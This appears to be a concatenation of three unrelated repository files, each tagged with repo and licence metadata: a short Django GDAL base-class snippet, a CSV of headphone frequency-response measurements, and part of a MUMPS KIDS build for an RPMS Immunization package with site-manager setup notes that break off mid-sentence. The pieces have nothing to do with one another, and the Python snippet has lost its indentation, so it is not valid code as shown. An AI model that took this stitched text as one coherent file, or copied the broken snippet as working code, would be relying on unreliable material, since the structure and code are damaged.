from django.contrib.gis.gdal.error import GDALException
from django.contrib.gis.ptr import CPointerBase
class GDALBase(CPointerBase):
null_ptr_exception_class = GDALException
| Python | 3 | jpmallarino/django | django/contrib/gis/gdal/base.py | [
"BSD-3-Clause",
"0BSD"
] |
frequency,raw
20.00,-1.64
20.20,-1.56
20.40,-1.49
20.61,-1.41
20.81,-1.33
21.02,-1.26
21.23,-1.18
21.44,-1.11
21.66,-1.03
21.87,-0.96
22.09,-0.88
22.31,-0.81
22.54,-0.74
22.76,-0.67
22.99,-0.60
23.22,-0.54
23.45,-0.46
23.69,-0.38
23.92,-0.31
24.16,-0.24
24.40,-0.16
24.65,-0.08
24.89,0.00
25.14,0.07
25.39,0.14
25.65,0.22
25.91,0.30
26.16,0.37
26.43,0.43
26.69,0.51
26.96,0.58
27.23,0.65
27.50,0.72
27.77,0.78
28.05,0.86
28.33,0.93
28.62,1.00
28.90,1.07
29.19,1.14
29.48,1.21
29.78,1.28
30.08,1.35
30.38,1.43
30.68,1.50
30.99,1.57
31.30,1.64
31.61,1.71
31.93,1.78
32.24,1.84
32.57,1.90
32.89,1.96
33.22,2.03
33.55,2.10
33.89,2.16
34.23,2.22
34.57,2.28
34.92,2.35
35.27,2.41
35.62,2.48
35.97,2.54
36.33,2.60
36.70,2.68
37.06,2.75
37.43,2.81
37.81,2.87
38.19,2.94
38.57,3.01
38.95,3.08
39.34,3.15
39.74,3.22
40.14,3.29
40.54,3.36
40.94,3.43
41.35,3.50
41.76,3.57
42.18,3.64
42.60,3.71
43.03,3.77
43.46,3.84
43.90,3.92
44.33,3.99
44.78,4.06
45.23,4.13
45.68,4.20
46.13,4.26
46.60,4.33
47.06,4.40
47.53,4.47
48.01,4.53
48.49,4.59
48.97,4.66
49.46,4.73
49.96,4.80
50.46,4.87
50.96,4.94
51.47,5.01
51.99,5.08
52.51,5.14
53.03,5.20
53.56,5.27
54.10,5.34
54.64,5.41
55.18,5.46
55.74,5.52
56.29,5.59
56.86,5.66
57.42,5.72
58.00,5.77
58.58,5.83
59.16,5.89
59.76,5.96
60.35,6.02
60.96,6.07
61.57,6.13
62.18,6.21
62.80,6.28
63.43,6.35
64.07,6.42
64.71,6.47
65.35,6.53
66.01,6.59
66.67,6.66
67.33,6.72
68.01,6.76
68.69,6.82
69.37,6.87
70.07,6.93
70.77,6.98
71.48,7.04
72.19,7.09
72.91,7.14
73.64,7.19
74.38,7.25
75.12,7.30
75.87,7.36
76.63,7.42
77.40,7.48
78.17,7.53
78.95,7.58
79.74,7.63
80.54,7.68
81.35,7.73
82.16,7.79
82.98,7.84
83.81,7.88
84.65,7.92
85.50,7.96
86.35,8.01
87.22,8.06
88.09,8.11
88.97,8.16
89.86,8.20
90.76,8.25
91.66,8.28
92.58,8.32
93.51,8.36
94.44,8.39
95.39,8.43
96.34,8.46
97.30,8.49
98.28,8.53
99.26,8.56
100.25,8.61
101.25,8.65
102.27,8.69
103.29,8.73
104.32,8.78
105.37,8.82
106.42,8.87
107.48,8.92
108.56,8.96
109.64,9.01
110.74,9.06
111.85,9.10
112.97,9.14
114.10,9.18
115.24,9.22
116.39,9.26
117.55,9.31
118.73,9.34
119.92,9.37
121.12,9.39
122.33,9.41
123.55,9.44
124.79,9.46
126.03,9.47
127.29,9.48
128.57,9.48
129.85,9.48
131.15,9.48
132.46,9.49
133.79,9.50
135.12,9.52
136.48,9.54
137.84,9.58
139.22,9.62
140.61,9.66
142.02,9.68
143.44,9.71
144.87,9.72
146.32,9.73
147.78,9.73
149.26,9.72
150.75,9.71
152.26,9.69
153.78,9.66
155.32,9.63
156.88,9.59
158.44,9.55
160.03,9.52
161.63,9.50
163.24,9.48
164.88,9.47
166.53,9.46
168.19,9.46
169.87,9.47
171.57,9.48
173.29,9.50
175.02,9.50
176.77,9.50
178.54,9.49
180.32,9.47
182.13,9.45
183.95,9.42
185.79,9.40
187.65,9.37
189.52,9.34
191.42,9.31
193.33,9.29
195.27,9.27
197.22,9.24
199.19,9.20
201.18,9.17
203.19,9.13
205.23,9.10
207.28,9.06
209.35,9.04
211.44,9.02
213.56,9.01
215.69,8.99
217.85,8.96
220.03,8.92
222.23,8.88
224.45,8.84
226.70,8.80
228.96,8.76
231.25,8.72
233.57,8.69
235.90,8.67
238.26,8.66
240.64,8.63
243.05,8.60
245.48,8.56
247.93,8.52
250.41,8.48
252.92,8.45
255.45,8.42
258.00,8.39
260.58,8.35
263.19,8.32
265.82,8.28
268.48,8.23
271.16,8.18
273.87,8.14
276.61,8.09
279.38,8.05
282.17,8.01
284.99,7.97
287.84,7.92
290.72,7.89
293.63,7.85
296.57,7.80
299.53,7.76
302.53,7.72
305.55,7.68
308.61,7.66
311.69,7.65
314.81,7.63
317.96,7.60
321.14,7.57
324.35,7.53
327.59,7.50
330.87,7.46
334.18,7.43
337.52,7.41
340.90,7.39
344.30,7.38
347.75,7.36
351.23,7.32
354.74,7.28
358.28,7.24
361.87,7.20
365.49,7.17
369.14,7.14
372.83,7.11
376.56,7.07
380.33,7.04
384.13,7.01
387.97,6.97
391.85,6.93
395.77,6.88
399.73,6.83
403.72,6.77
407.76,6.71
411.84,6.65
415.96,6.60
420.12,6.56
424.32,6.52
428.56,6.47
432.85,6.41
437.18,6.35
441.55,6.30
445.96,6.26
450.42,6.21
454.93,6.17
459.48,6.11
464.07,6.07
468.71,6.02
473.40,5.97
478.13,5.92
482.91,5.86
487.74,5.82
492.62,5.75
497.55,5.68
502.52,5.61
507.55,5.55
512.62,5.48
517.75,5.42
522.93,5.36
528.16,5.28
533.44,5.20
538.77,5.11
544.16,5.04
549.60,4.96
555.10,4.88
560.65,4.79
566.25,4.70
571.92,4.62
577.64,4.53
583.41,4.45
589.25,4.36
595.14,4.27
601.09,4.19
607.10,4.11
613.17,4.01
619.30,3.92
625.50,3.84
631.75,3.75
638.07,3.66
644.45,3.57
650.89,3.47
657.40,3.36
663.98,3.25
670.62,3.14
677.32,3.03
684.10,2.93
690.94,2.82
697.85,2.71
704.83,2.60
711.87,2.50
718.99,2.40
726.18,2.30
733.44,2.20
740.78,2.10
748.19,2.02
755.67,1.93
763.23,1.83
770.86,1.74
778.57,1.66
786.35,1.58
794.22,1.51
802.16,1.43
810.18,1.35
818.28,1.28
826.46,1.22
834.73,1.15
843.08,1.08
851.51,1.02
860.02,0.95
868.62,0.90
877.31,0.83
886.08,0.77
894.94,0.70
903.89,0.62
912.93,0.56
922.06,0.50
931.28,0.44
940.59,0.37
950.00,0.30
959.50,0.24
969.09,0.18
978.78,0.12
988.57,0.06
998.46,0.01
1008.44,-0.04
1018.53,-0.08
1028.71,-0.11
1039.00,-0.14
1049.39,-0.17
1059.88,-0.20
1070.48,-0.23
1081.19,-0.27
1092.00,-0.30
1102.92,-0.32
1113.95,-0.34
1125.09,-0.35
1136.34,-0.35
1147.70,-0.34
1159.18,-0.34
1170.77,-0.34
1182.48,-0.34
1194.30,-0.34
1206.25,-0.34
1218.31,-0.34
1230.49,-0.33
1242.80,-0.31
1255.22,-0.29
1267.78,-0.26
1280.45,-0.23
1293.26,-0.20
1306.19,-0.18
1319.25,-0.16
1332.45,-0.13
1345.77,-0.10
1359.23,-0.05
1372.82,0.01
1386.55,0.06
1400.41,0.12
1414.42,0.19
1428.56,0.27
1442.85,0.35
1457.28,0.42
1471.85,0.49
1486.57,0.56
1501.43,0.63
1516.45,0.71
1531.61,0.80
1546.93,0.88
1562.40,0.98
1578.02,1.06
1593.80,1.15
1609.74,1.25
1625.84,1.35
1642.10,1.44
1658.52,1.54
1675.10,1.65
1691.85,1.76
1708.77,1.87
1725.86,1.98
1743.12,2.11
1760.55,2.23
1778.15,2.35
1795.94,2.48
1813.90,2.61
1832.03,2.74
1850.36,2.86
1868.86,3.00
1887.55,3.15
1906.42,3.29
1925.49,3.43
1944.74,3.58
1964.19,3.73
1983.83,3.88
2003.67,4.03
2023.71,4.17
2043.94,4.32
2064.38,4.48
2085.03,4.63
2105.88,4.79
2126.94,4.95
2148.20,5.11
2169.69,5.25
2191.38,5.39
2213.30,5.53
2235.43,5.68
2257.78,5.81
2280.36,5.93
2303.17,6.04
2326.20,6.16
2349.46,6.26
2372.95,6.35
2396.68,6.41
2420.65,6.47
2444.86,6.52
2469.31,6.53
2494.00,6.54
2518.94,6.54
2544.13,6.53
2569.57,6.50
2595.27,6.45
2621.22,6.39
2647.43,6.31
2673.90,6.20
2700.64,6.07
2727.65,5.93
2754.93,5.78
2782.48,5.61
2810.30,5.43
2838.40,5.24
2866.79,5.04
2895.46,4.83
2924.41,4.60
2953.65,4.36
2983.19,4.13
3013.02,3.90
3043.15,3.68
3073.58,3.45
3104.32,3.24
3135.36,3.02
3166.72,2.81
3198.38,2.62
3230.37,2.43
3262.67,2.24
3295.30,2.07
3328.25,1.91
3361.53,1.75
3395.15,1.60
3429.10,1.48
3463.39,1.36
3498.03,1.27
3533.01,1.19
3568.34,1.13
3604.02,1.09
3640.06,1.07
3676.46,1.09
3713.22,1.15
3750.36,1.23
3787.86,1.33
3825.74,1.45
3864.00,1.58
3902.64,1.74
3941.66,1.94
3981.08,2.15
4020.89,2.38
4061.10,2.62
4101.71,2.89
4142.73,3.16
4184.15,3.45
4226.00,3.76
4268.26,4.08
4310.94,4.40
4354.05,4.72
4397.59,5.06
4441.56,5.39
4485.98,5.71
4530.84,6.02
4576.15,6.31
4621.91,6.58
4668.13,6.83
4714.81,7.03
4761.96,7.20
4809.58,7.35
4857.67,7.46
4906.25,7.53
4955.31,7.58
5004.87,7.60
5054.91,7.58
5105.46,7.52
5156.52,7.44
5208.08,7.33
5260.16,7.17
5312.77,6.96
5365.89,6.71
5419.55,6.42
5473.75,6.09
5528.49,5.72
5583.77,5.28
5639.61,4.79
5696.00,4.24
5752.96,3.66
5810.49,3.03
5868.60,2.37
5927.28,1.70
5986.56,1.01
6046.42,0.32
6106.89,-0.39
6167.96,-1.09
6229.64,-1.79
6291.93,-2.48
6354.85,-3.13
6418.40,-3.76
6482.58,-4.36
6547.41,-4.96
6612.88,-5.56
6679.01,-6.15
6745.80,-6.71
6813.26,-7.27
6881.39,-7.81
6950.21,-8.34
7019.71,-8.86
7089.91,-9.37
7160.81,-9.85
7232.41,-10.30
7304.74,-10.72
7377.79,-11.12
7451.56,-11.50
7526.08,-11.85
7601.34,-12.18
7677.35,-12.48
7754.13,-12.75
7831.67,-12.98
7909.98,-13.17
7989.08,-13.35
8068.98,-13.52
8149.67,-13.69
8231.16,-13.83
8313.47,-13.94
8396.61,-14.03
8480.57,-14.10
8565.38,-14.15
8651.03,-14.18
8737.54,-14.18
8824.92,-14.16
8913.17,-14.13
9002.30,-14.07
9092.32,-14.00
9183.25,-13.92
9275.08,-13.83
9367.83,-13.70
9461.51,-13.56
9556.12,-13.41
9651.68,-13.24
9748.20,-13.06
9845.68,-12.85
9944.14,-12.64
10043.58,-12.43
10144.02,-12.22
10245.46,-12.00
10347.91,-11.79
10451.39,-11.59
10555.91,-11.41
10661.46,-11.27
10768.08,-11.14
10875.76,-11.05
10984.52,-10.99
11094.36,-10.97
11205.31,-10.99
11317.36,-11.04
11430.53,-11.12
11544.84,-11.21
11660.29,-11.32
11776.89,-11.46
11894.66,-11.62
12013.60,-11.80
12133.74,-11.98
12255.08,-12.20
12377.63,-12.43
12501.41,-12.69
12626.42,-12.96
12752.68,-13.26
12880.21,-13.58
13009.01,-13.91
13139.10,-14.24
13270.49,-14.59
13403.20,-14.92
13537.23,-15.26
13672.60,-15.59
13809.33,-15.91
13947.42,-16.24
14086.90,-16.55
14227.77,-16.85
14370.04,-17.12
14513.74,-17.39
14658.88,-17.68
14805.47,-17.99
14953.52,-18.36
15103.06,-18.78
15254.09,-19.27
15406.63,-19.86
15560.70,-20.56
15716.30,-21.40
15873.47,-22.35
16032.20,-23.40
16192.52,-24.53
16354.45,-25.74
16517.99,-26.99
16683.17,-28.29
16850.01,-29.60
17018.51,-30.91
17188.69,-32.20
17360.58,-33.45
17534.18,-34.65
17709.53,-35.79
17886.62,-36.85
18065.49,-37.89
18246.14,-38.90
18428.60,-39.87
18612.89,-40.80
18799.02,-41.70
18987.01,-42.56
19176.88,-43.38
19368.65,-44.16
19562.33,-44.91
19757.96,-45.61
19955.54,-46.28
| CSV | 2 | vinzmc/AutoEq | measurements/referenceaudioanalyzer/data/inear/SIEC/Whizzer TP1s (closed vent)/Whizzer TP1s (closed vent).csv | [
"MIT"
] |
KIDS Distribution saved on Sep 03, 2015@16:03:22
BIV SUPPLEMENT 1.0
**KIDS**:BIV SUPPLEMENT 1.0^
**INSTALL NAME**
BIV SUPPLEMENT 1.0
"BLD",8520,0)
BIV SUPPLEMENT 1.0^^0^3150903^n
"BLD",8520,1,0)
^^1^1^3150903^
"BLD",8520,1,1,0)
Additional BI files not included in VistA port.
"BLD",8520,4,0)
^9.64PA^9002084.118^11
"BLD",8520,4,9002084.118,0)
9002084.118
"BLD",8520,4,9002084.118,222)
y^y^f^^^^n
"BLD",8520,4,9002084.61,0)
9002084.61
"BLD",8520,4,9002084.61,222)
y^y^f^^n^^n^o^n
"BLD",8520,4,9002084.62,0)
9002084.62
"BLD",8520,4,9002084.62,222)
y^y^f^^n^^n^o^n
"BLD",8520,4,9002084.63,0)
9002084.63
"BLD",8520,4,9002084.63,222)
y^y^f^^n^^n^o^n
"BLD",8520,4,9002084.7,0)
9002084.7
"BLD",8520,4,9002084.7,222)
y^y^f^^n^^y^o^n
"BLD",8520,4,9002084.8,0)
9002084.8
"BLD",8520,4,9002084.8,222)
y^y^f^^n^^y^o^n
"BLD",8520,4,9002084.82,0)
9002084.82
"BLD",8520,4,9002084.82,222)
y^y^f^^n^^y^o^n
"BLD",8520,4,9002084.83,0)
9002084.83
"BLD",8520,4,9002084.83,222)
y^y^f^^n^^y^o^n
"BLD",8520,4,9002084.94,0)
9002084.94
"BLD",8520,4,9002084.94,222)
y^y^f^^n^^y^o^n
"BLD",8520,4,9002084.95,0)
9002084.95
"BLD",8520,4,9002084.95,222)
y^y^f^^n^^y^o^n
"BLD",8520,4,9002084.97,0)
9002084.97
"BLD",8520,4,9002084.97,222)
y^y^f^^n^^y^o^n
"BLD",8520,4,"B",9002084.118,9002084.118)
"BLD",8520,4,"B",9002084.61,9002084.61)
"BLD",8520,4,"B",9002084.62,9002084.62)
"BLD",8520,4,"B",9002084.63,9002084.63)
"BLD",8520,4,"B",9002084.7,9002084.7)
"BLD",8520,4,"B",9002084.8,9002084.8)
"BLD",8520,4,"B",9002084.82,9002084.82)
"BLD",8520,4,"B",9002084.83,9002084.83)
"BLD",8520,4,"B",9002084.94,9002084.94)
"BLD",8520,4,"B",9002084.95,9002084.95)
"BLD",8520,4,"B",9002084.97,9002084.97)
"BLD",8520,6.3)
3
"BLD",8520,"KRN",0)
^9.67PA^9002226^21
"BLD",8520,"KRN",.4,0)
.4
"BLD",8520,"KRN",.401,0)
.401
"BLD",8520,"KRN",.402,0)
.402
"BLD",8520,"KRN",.403,0)
.403
"BLD",8520,"KRN",.5,0)
.5
"BLD",8520,"KRN",.84,0)
.84
"BLD",8520,"KRN",3.6,0)
3.6
"BLD",8520,"KRN",3.8,0)
3.8
"BLD",8520,"KRN",9.2,0)
9.2
"BLD",8520,"KRN",9.8,0)
9.8
"BLD",8520,"KRN",19,0)
19
"BLD",8520,"KRN",19.1,0)
19.1
"BLD",8520,"KRN",101,0)
101
"BLD",8520,"KRN",409.61,0)
409.61
"BLD",8520,"KRN",771,0)
771
"BLD",8520,"KRN",779.2,0)
779.2
"BLD",8520,"KRN",870,0)
870
"BLD",8520,"KRN",8989.51,0)
8989.51
"BLD",8520,"KRN",8989.52,0)
8989.52
"BLD",8520,"KRN",8994,0)
8994
"BLD",8520,"KRN",9002226,0)
9002226
"BLD",8520,"KRN","B",.4,.4)
"BLD",8520,"KRN","B",.401,.401)
"BLD",8520,"KRN","B",.402,.402)
"BLD",8520,"KRN","B",.403,.403)
"BLD",8520,"KRN","B",.5,.5)
"BLD",8520,"KRN","B",.84,.84)
"BLD",8520,"KRN","B",3.6,3.6)
"BLD",8520,"KRN","B",3.8,3.8)
"BLD",8520,"KRN","B",9.2,9.2)
"BLD",8520,"KRN","B",9.8,9.8)
"BLD",8520,"KRN","B",19,19)
"BLD",8520,"KRN","B",19.1,19.1)
"BLD",8520,"KRN","B",101,101)
"BLD",8520,"KRN","B",409.61,409.61)
"BLD",8520,"KRN","B",771,771)
"BLD",8520,"KRN","B",779.2,779.2)
"BLD",8520,"KRN","B",870,870)
"BLD",8520,"KRN","B",8989.51,8989.51)
"BLD",8520,"KRN","B",8989.52,8989.52)
"BLD",8520,"KRN","B",8994,8994)
"BLD",8520,"KRN","B",9002226,9002226)
"DATA",9002084.7,1,0)
SETUP INFORMATION FOR VERSION 8.2
"DATA",9002084.7,1,1,0)
^^270^270^3070531^
"DATA",9002084.7,1,1,1,0)
"DATA",9002084.7,1,1,2,0)
The text presented here is intended to provide Site Managers with
"DATA",9002084.7,1,1,3,0)
helpful information regarding setup and management of the RPMS
"DATA",9002084.7,1,1,4,0)
Immunization Package, version 8.2.
"DATA",9002084.7,1,1,5,0)
"DATA",9002084.7,1,1,6,0)
"DATA",9002084.7,1,1,7,0)
"DATA",9002084.7,1,1,8,0)
I. OPTIONS
"DATA",9002084.7,1,1,9,0)
----------
"DATA",9002084.7,1,1,10,0)
"DATA",9002084.7,1,1,11,0)
The main menu option for the Immunization package is BIMENU.
"DATA",9002084.7,1,1,12,0)
At most sites this would be placed on AKMOCORE along with other
"DATA",9002084.7,1,1,13,0)
RPMS packages. For the sake of consistency from site to site,
"DATA",9002084.7,1,1,14,0)
it is recommended that the synonym "IMM" (Immunization) be
"DATA",9002084.7,1,1,15,0)
given to the main menu option BIMENU, however, this is not a
"DATA",9002084.7,1,1,16,0)
requirement. BIMENU allows access to every other option within
"DATA",9002084.7,1,1,17,0)
the package. (The Package Keys, BIZMENU ,BIZ EDIT PATIENTS, and
"DATA",9002084.7,1,1,18,0)
BIZ MANAGER, are discussed below under Security in Section II.)
"DATA",9002084.7,1,1,19,0)
"DATA",9002084.7,1,1,20,0)
The option BI PATIENT VIEW/EDIT, "Patient Immunization Record",
"DATA",9002084.7,1,1,21,0)
is the main option for all users to view a patient's immunization
"DATA",9002084.7,1,1,22,0)
data. This option allows users to display or print the patient's
"DATA",9002084.7,1,1,23,0)
Immunization History and Forecast, Official Immunization Record, and
"DATA",9002084.7,1,1,24,0)
Health Summary. If the user has the appropriate key (BIZ EDIT
"DATA",9002084.7,1,1,25,0)
PATIENTS), additional actions for adding/editing patient data will
"DATA",9002084.7,1,1,26,0)
be made available under this option.
"DATA",9002084.7,1,1,27,0)
"DATA",9002084.7,1,1,28,0)
NOTE: Users accessing this option will have NO ADD/EDIT capability
"DATA",9002084.7,1,1,29,0)
whatsoever--it will be informational only--UNLESS they have
"DATA",9002084.7,1,1,30,0)
the BIZ EDIT PATIENTS Key; in which case additional Add/Edit
"DATA",9002084.7,1,1,31,0)
Actions will be available. (See Security Section II below.)
"DATA",9002084.7,1,1,32,0)
"DATA",9002084.7,1,1,33,0)
This option may be attached to any other Kernel menu and need not
"DATA",9002084.7,1,1,34,0)
be accessed via the main menu, BIMENU. This option is found within
"DATA",9002084.7,1,1,35,0)
the package under the Patient Menu of the Immunization Main Menu.
"DATA",9002084.7,1,1,36,0)
"DATA",9002084.7,1,1,37,0)
After this package has been installed and the BIMENU and BI PATIENT
"DATA",9002084.7,1,1,38,0)
VIEW/EDIT Options added to the appropriate menus, it is a good idea
"DATA",9002084.7,1,1,39,0)
to run the "Build Primary Menu Trees" Option under Kernel Menu
"DATA",9002084.7,1,1,40,0)
Management (under AKMOEVE). This will enable users to jump to menu
"DATA",9002084.7,1,1,41,0)
synonyms within the new Immunization Package.
"DATA",9002084.7,1,1,42,0)
"DATA",9002084.7,1,1,43,0)
There is also an option called BI LOT NUMBER NON-MANAGER, which is
"DATA",9002084.7,1,1,44,0)
locked by the Key BIZ LOT NON-MANAGER. This "stand-alone" option is
"DATA",9002084.7,1,1,45,0)
NOT connected to the rest of the RPMS Immunization Menu; instead it
"DATA",9002084.7,1,1,46,0)
may be assigned to any menu of any user for the purpose of adding and
"DATA",9002084.7,1,1,47,0)
editing Lot Numbers in the Immunization Package. The option allows
"DATA",9002084.7,1,1,48,0)
someone, such as a pharmacist, to add and maintain the Lot Number
"DATA",9002084.7,1,1,49,0)
Inventory without gaining access to the rest of the Manager Menu in
"DATA",9002084.7,1,1,50,0)
the Immunization Package.
"DATA",9002084.7,1,1,51,0)
"DATA",9002084.7,1,1,52,0)
"DATA",9002084.7,1,1,53,0)
"DATA",9002084.7,1,1,54,0)
II. SECURITY
"DATA",9002084.7,1,1,55,0)
------------
"DATA",9002084.7,1,1,56,0)
"DATA",9002084.7,1,1,57,0)
The Security Key BIZMENU allows users to access the Main Menu of
"DATA",9002084.7,1,1,58,0)
the RPMS Immunization Package, BIMENU, and its submenus for viewing
"DATA",9002084.7,1,1,59,0)
Patient data and Reports. The BIZMENU Key does NOT provide any
"DATA",9002084.7,1,1,60,0)
Add or Edit capabilities, however, Holders of this key may print
"DATA",9002084.7,1,1,61,0)
patient letters, view patient data, and run reports.
"DATA",9002084.7,1,1,62,0)
"DATA",9002084.7,1,1,63,0)
The Security Key BIZ EDIT PATIENTS allows users to ADD and EDIT
"DATA",9002084.7,1,1,64,0)
a patient's Immunization History, Contraindications, Skin Tests,
"DATA",9002084.7,1,1,65,0)
Parent/Guardian, etc. This key does not provide access to any
"DATA",9002084.7,1,1,66,0)
additional menu options; instead, it adds several Actions to the
"DATA",9002084.7,1,1,67,0)
main Patient View screen. This Key should be given to staff who
"DATA",9002084.7,1,1,68,0)
are responsible for data entry and Patient Management.
"DATA",9002084.7,1,1,69,0)
"DATA",9002084.7,1,1,70,0)
The security key BIZ MANAGER allows a user to access the Manager
"DATA",9002084.7,1,1,71,0)
Menu (BI MENU-MANAGER), which is a submenu of the main menu (BIMENU).
"DATA",9002084.7,1,1,72,0)
The Manager Menu provides access to many sensitive functions
"DATA",9002084.7,1,1,73,0)
pertaining to Site Parameters, Form Letters, the Vaccine Table,
"DATA",9002084.7,1,1,74,0)
Lot Numbers, Exports, and the allocation of Security Keys.
"DATA",9002084.7,1,1,75,0)
"DATA",9002084.7,1,1,76,0)
The BIZ MANAGER Key should only be given to the manager of the
"DATA",9002084.7,1,1,77,0)
Immunization Package.
"DATA",9002084.7,1,1,78,0)
"DATA",9002084.7,1,1,79,0)
Also see the "Help" Action on the HOLDERS OF IMMUNIZATION
"DATA",9002084.7,1,1,80,0)
KEYS" Screen (MGR-->KEY-->Help).
"DATA",9002084.7,1,1,81,0)
"DATA",9002084.7,1,1,82,0)
Finally, the Key BIZ LOT NON-MANAGER can be given any person (for
"DATA",9002084.7,1,1,83,0)
example, a pharmacist) who needs to add or edit Vaccine Lot Numbers
"DATA",9002084.7,1,1,84,0)
but does not need access to the entire Imm Manager Menu.
"DATA",9002084.7,1,1,85,0)
NOTE: Assignment of this option, BI LOT NUMBER NON-MANAGER, to other
"DATA",9002084.7,1,1,86,0)
menus in RPMS is done by the local site manager, as is the key, BIZ
"DATA",9002084.7,1,1,87,0)
LOT NON-MANAGER. This option and its key cannot be assigned from
"DATA",9002084.7,1,1,88,0)
within the Immunization Package itself.
"DATA",9002084.7,1,1,89,0)
"DATA",9002084.7,1,1,90,0)
"DATA",9002084.7,1,1,91,0)
"DATA",9002084.7,1,1,92,0)
III. DEVICES
"DATA",9002084.7,1,1,93,0)
------------
"DATA",9002084.7,1,1,94,0)
"DATA",9002084.7,1,1,95,0)
This package makes extensive use of the VA Screen Manager and
"DATA",9002084.7,1,1,96,0)
List Manager, which requires that several of the cursor and screen
"DATA",9002084.7,1,1,97,0)
handling fields of the Terminal Type file be present for any Device
"DATA",9002084.7,1,1,98,0)
accessing the package. It is recommended that any Device
"DATA",9002084.7,1,1,99,0)
accessing this package be given a Terminal Type ("Subtype")
"DATA",9002084.7,1,1,100,0)
of "C-VT100", since the standard VA Kernel distribution comes
"DATA",9002084.7,1,1,101,0)
with all of the necessary codes pre-loaded. A user whose Terminal
"DATA",9002084.7,1,1,102,0)
Type does not contain a complete set of screen handling codes will
"DATA",9002084.7,1,1,103,0)
receive a message that Screenman cannot "load the form."
"DATA",9002084.7,1,1,104,0)
"DATA",9002084.7,1,1,105,0)
If you suspect that the screen handling codes for C-VT100 on your
"DATA",9002084.7,1,1,106,0)
system are not complete, this package comes with a routine, BIVT100,
"DATA",9002084.7,1,1,107,0)
that will update (as of 2000) your VT100 codes. The routine must be
"DATA",9002084.7,1,1,108,0)
run from Programmer Mode, and a line with ZIS must be uncommented.
"DATA",9002084.7,1,1,109,0)
This job should be done by a programmer or experienced Site Manager.
"DATA",9002084.7,1,1,110,0)
"DATA",9002084.7,1,1,111,0)
Other Terminal Types may also be chosen, however, the screen
"DATA",9002084.7,1,1,112,0)
handling codes for Cursor movements, "PF keys", "Erase Entire
"DATA",9002084.7,1,1,113,0)
Page", etc., may need to be entered manually if they are not
"DATA",9002084.7,1,1,114,0)
already present for the selected Terminal Type.
"DATA",9002084.7,1,1,115,0)
"DATA",9002084.7,1,1,116,0)
If for some reason it is not practical to define Devices
"DATA",9002084.7,1,1,117,0)
accessing the package with a Subtype of C-VT100, users of the
"DATA",9002084.7,1,1,118,0)
package may be given a "DEFAULT TERMINAL TYPE FOR LM" in the
"DATA",9002084.7,1,1,119,0)
NEW PERSON File #200 of C-VT100. (They will then be given a
"DATA",9002084.7,1,1,120,0)
Terminal Type of C-VT100 regardless of which DEVICE they sign
"DATA",9002084.7,1,1,121,0)
on through.) It may also be necessary to set the field "ASK
"DATA",9002084.7,1,1,122,0)
DEVICE TYPE AT SIGN-ON" (again in file #200) equal to "ASK" in
"DATA",9002084.7,1,1,123,0)
order to get a user's Terminal Type to change to the C-VT100.
"DATA",9002084.7,1,1,124,0)
"DATA",9002084.7,1,1,125,0)
It is important that PC's accessing this software through terminal
"DATA",9002084.7,1,1,126,0)
emulation software have their function keys F1-F4 set to transmit
"DATA",9002084.7,1,1,127,0)
standard VT-100 codes for these keys rather than other customized
"DATA",9002084.7,1,1,128,0)
codes.
"DATA",9002084.7,1,1,129,0)
"DATA",9002084.7,1,1,130,0)
This software makes use of basic character format codes such as
"DATA",9002084.7,1,1,131,0)
Reverse Video, Highlight, and Underlining. It may be helpful to
"DATA",9002084.7,1,1,132,0)
adjust the colors that the terminal emulation software employs to
"DATA",9002084.7,1,1,133,0)
display these formats.
"DATA",9002084.7,1,1,134,0)
"DATA",9002084.7,1,1,135,0)
There are several network terminal emulation programs available,
"DATA",9002084.7,1,1,136,0)
however many of them have limitations such as not recognizing
"DATA",9002084.7,1,1,137,0)
function keys, not displaying reverse video, not slave printing, etc.
"DATA",9002084.7,1,1,138,0)
As of this printing, February 2004, we have found that NetTerm 4.2e
"DATA",9002084.7,1,1,139,0)
available at a nominal cost from Intersoft International, Inc. via
"DATA",9002084.7,1,1,140,0)
the WWW, is among the best products for use with RPMS software.
"DATA",9002084.7,1,1,141,0)
Trial versions may be obtained online at:
"DATA",9002084.7,1,1,142,0)
http://www.securenetterm.com/html/netterm.html
"DATA",9002084.7,1,1,143,0)
"DATA",9002084.7,1,1,144,0)
Initial difficulties with the screen handling codes for ScreenMan
"DATA",9002084.7,1,1,145,0)
and Listman are not specific to Immunization; however, if problems
"DATA",9002084.7,1,1,146,0)
with the setup cannot be resolved, please contact your Computer
"DATA",9002084.7,1,1,147,0)
Support staff for further assistance.
"DATA",9002084.7,1,1,148,0)
"DATA",9002084.7,1,1,149,0)
"DATA",9002084.7,1,1,150,0)
"DATA",9002084.7,1,1,151,0)
IV. SITE PARAMETERS
"DATA",9002084.7,1,1,152,0)
--------------------
"DATA",9002084.7,1,1,153,0)
"DATA",9002084.7,1,1,154,0)
As part of the installation of this new version of Immunization,
"DATA",9002084.7,1,1,155,0)
the site parameters must be reviewed and edited.
"DATA",9002084.7,1,1,156,0)
"DATA",9002084.7,1,1,157,0)
The Site Parameter screen may be accessed from within the
"DATA",9002084.7,1,1,158,0)
Immunization menus by selecting Manager Menu from the the Main Menu,
"DATA",9002084.7,1,1,159,0)
and then selecting Edit Site Parameters (MGR-->ESP). Help text is
"DATA",9002084.7,1,1,160,0)
displayed during the edit each Site Parameter.
"DATA",9002084.7,1,1,161,0)
"DATA",9002084.7,1,1,162,0)
"DATA",9002084.7,1,1,163,0)
"DATA",9002084.7,1,1,164,0)
V. VACCINE TABLE
"DATA",9002084.7,1,1,165,0)
-------------------
"DATA",9002084.7,1,1,166,0)
"DATA",9002084.7,1,1,167,0)
The Immunization Package version 8.1 comes with a new Vaccine Table
"DATA",9002084.7,1,1,168,0)
that has been standardized with the CDC's NIP HL7/CVX Code Table.
"DATA",9002084.7,1,1,169,0)
The vaccine table, spellings, CVX codes and CPT codes are taken directly
"DATA",9002084.7,1,1,170,0)
from the CDC table http://www.cdc.gov/nip/registry/hl7/hl7-cvx.pdf.
"DATA",9002084.7,1,1,171,0)
There are several new fields in the Vaccine Table that relate to new
"DATA",9002084.7,1,1,172,0)
functions in the package, most notably the ImmServe Forecasting
"DATA",9002084.7,1,1,173,0)
utility (See IV. above). For this reason it is critically important
"DATA",9002084.7,1,1,174,0)
that specific fields within the table not be altered.
"DATA",9002084.7,1,1,175,0)
"DATA",9002084.7,1,1,176,0)
Each time a user logs into the Immunization Package, the Vaccine
"DATA",9002084.7,1,1,177,0)
Table is checked for integrity. If certain fields have been altered,
"DATA",9002084.7,1,1,178,0)
a warning message is issued, and several functions within the package
"DATA",9002084.7,1,1,179,0)
begin to display the warning. Some basic functions of the package
"DATA",9002084.7,1,1,180,0)
will continue to operate, such as the display of a patient's
